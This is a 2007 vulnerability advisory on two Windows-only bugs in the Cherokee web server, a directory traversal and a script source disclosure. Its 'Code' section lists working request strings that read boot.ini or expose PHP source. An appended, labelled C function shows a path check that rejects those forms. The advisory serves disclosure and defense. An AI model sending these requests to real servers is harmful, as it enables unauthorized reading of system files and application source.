#######################################################################

                             Luigi Auriemma

Application:  Cherokee Web Server
              http://www.cherokee-project.com
Versions:     <= SVN 952 (and current one for bug B)
Platforms:    only Windows affected
Bugs:         A] directory traversal
              B] scripts source disclosure
Exploitation: remote
Date:         17 Dec 2007
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


Cherokee is a web server written mainly for the *nix environment.
It is also available for Windows, although with lower priority (the
pre-compiled binary on the website is the old 0.5.4 version, so the
user should compile the current SVN for a more recent version), and the
Windows version is the only one vulnerable to the following bugs.


#######################################################################

=======
2) Bugs
=======

----------------------
A] directory traversal
----------------------

A directory traversal vulnerability is exploitable by adding a
backslash at the beginning of the URI (after the initial slash),
allowing an attacker to download any file on the disk on which the
document_root directory is located.


----------------------------
B] scripts source disclosure
----------------------------

The source code of the scripts on the server (like PHP) can be viewed
by adding the chars dot, NULL and space at the end of the filename.
The cgi-bin executables, instead, don't seem to be affected by this
problem.


#######################################################################

===========
3) The Code
===========


A]
http://SERVER/\..\..%5c..\..\boot.ini
GET /\..\..\..\..\boot.ini HTTP/1.0
GET /%5c..\..\..\..\boot.ini HTTP/1.0

B]
http://SERVER/file.php.
http://SERVER/file.php%00
http://SERVER/file.php%20
http://SERVER/file.php%2e


#######################################################################

======
4) Fix
======


SVN 954 for bug A.
Bug B will be fixed soon.


#######################################################################
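
Added example, not part of the original advisory and not Cherokee's own
code: a request-path check that a server on Windows could run before
mapping a URI under document_root, rejecting the request forms listed in
section 3. The names uri_path_is_safe and hexval are hypothetical.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: value of one hex digit, or -1 if not a hex digit. */
static int hexval(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* Returns 1 if the raw request path may be mapped under document_root on
 * Windows, 0 if it must be refused. Percent-decodes once, treats '\' as a
 * separator, then validates every path segment. */
int uri_path_is_safe(const char *raw) {
    char buf[1024];
    size_t n = 0;

    if (raw[0] != '/') return 0;
    for (const char *p = raw; *p; p++) {
        int c = (unsigned char)*p;
        if (c == '%') {
            int hi = hexval((unsigned char)p[1]);
            int lo = hi < 0 ? -1 : hexval((unsigned char)p[2]);
            if (lo < 0) return 0;           /* malformed escape */
            c = hi * 16 + lo;
            p += 2;
        }
        if (c == 0) return 0;               /* %00 truncates the filename */
        if (c == '\\') c = '/';             /* '\' and %5c separate on Windows */
        if (n + 1 >= sizeof buf) return 0;  /* refuse over-long paths */
        buf[n++] = (char)c;
    }
    buf[n] = '\0';

    for (char *seg = buf + 1; ; ) {
        char *end = strchr(seg, '/');
        size_t len = end ? (size_t)(end - seg) : strlen(seg);
        /* A trailing dot or space is dropped by Windows when the file is
         * opened; this test also refuses "." and ".." segments. */
        if (len > 0 && (seg[len - 1] == '.' || seg[len - 1] == ' ')) return 0;
        if (!end) break;
        seg = end + 1;
    }
    return 1;
}
```

The same decoded string that passed the check should be the one used for
the handler lookup and the file open, so the validated name and the
opened name cannot differ.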